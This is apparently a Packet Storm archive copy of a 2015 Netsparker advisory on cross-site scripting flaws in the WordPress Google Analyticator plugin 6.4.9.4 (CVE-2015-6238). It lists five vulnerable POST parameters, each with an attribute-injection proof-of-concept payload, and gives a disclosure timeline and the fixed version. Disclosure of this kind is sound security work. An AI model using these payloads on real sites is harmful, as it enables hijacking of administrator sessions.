what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Google Analyticator 6.4.9.4 Cross Site Scripting

Google Analyticator 6.4.9.4 Cross Site Scripting
Posted Aug 25, 2015
Authored by Omar Kurt | Site netsparker.com

WordPress Google Analyticator plugin version 6.4.9.4 suffers from cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
advisories | CVE-2015-6238
SHA-256 | 7f7523e430b3afce63313d41c2b6e4084ef335223ee61e6f6fdb35a34d45f768

Google Analyticator 6.4.9.4 Cross Site Scripting

Change Mirror Download
Information
--------------------
Advisory by Netsparker.
Name: Multiple XSS Vulnerabilities in Google Analyticator
Affected Software : Google Analyticator (WordPress Plugin)
Affected Versions: 6.4.9.4 and possibly below
Vendor Homepage : https://wordpress.org/plugins/google-analyticator/
Vulnerability Type : Cross-site Scripting
Severity : Important
Status : Fixed
CVE-ID : CVE-2015-6238
Netsparker Advisory Reference : NS-15-013

Description
--------------------
By exploiting a Cross-site scripting vulnerability the attacker can hijack
a logged in user’s session. This means that the malicious hacker can change
the logged in user’s password and invalidate the session of the victim
while the hacker maintains access. As seen from the XSS example in this
article, if a web application is vulnerable to cross-site scripting and the
administrator’s session is hijacked, the malicious hacker exploiting the
vulnerability will have full admin privileges on that web application.

Technical Details
--------------------
Proof of Concept URLs for XSS in Google Analyticator 6.4.9.4:

Url http://example.com/wordpress/wp-admin/admin.php?page=google-analyticator
Parameter Name ga_adsense
Parameter Type POST
Attack Pattern x'" onmouseover=alert(9)

Url http://example.com/wordpress/wp-admin/admin.php?page=google-analyticator
Parameter Name ga_admin_disable_DimentionIndex
Parameter Type POST
Attack Pattern x'" onmouseover=alert(9)

Url http://example.com/wordpress/wp-admin/admin.php?page=google-analyticator
Parameter Name ga_downloads_prefix
Parameter Type POST
Attack Pattern x'" onmouseover=alert(9)

Url http://example.com/wordpress/wp-admin/admin.php?page=google-analyticator
Parameter Name ga_downloads
Parameter Type POST
Attack Pattern x'" onmouseover=alert(9)

Url http://example.com/wordpress/wp-admin/admin.php?page=google-analyticator
Parameter Name ga_outbound_prefix
Parameter Type POST
Attack Pattern x'" onmouseover=alert(9)

For more information on cross-site scripting vulnerabilities read the
following article:
https://www.netsparker.com/web-vulnerability-scanner/vulnerability-security-checks-index/crosssite-scripting-xss/

Advisory Timeline
--------------------
14/08/2015 - First Contact
24/08/2015 - Vendor Fixed
24/08/2015 - Advisory Released

Solution
--------------------
https://downloads.wordpress.org/plugin/google-analyticator.6.4.9.6.zip

Credits & Authors
--------------------
These issues have been discovered by Omar Kurt while testing Netsparker Web
Application Security Scanner.

About Netsparker
--------------------
Netsparker finds and reports security issues and vulnerabilities such as
SQL Injection and Cross-site Scripting (XSS) in all websites and web
applications regardless of the platform and the technology they are built
on. Netsparker's unique detection and exploitation techniques allows it to
be dead accurate in reporting hence it's the first and the only False
Positive Free web application security scanner. For more information visit
our website on https://www.netsparker.com

--
Onur Yılmaz - National General Manager

Netsparker Web Application Security Scanner <https://www.netsparker.com>
T: +90 (0)554 873 0482
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    34 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    19 Files
  • 23
    Jul 23rd
    17 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close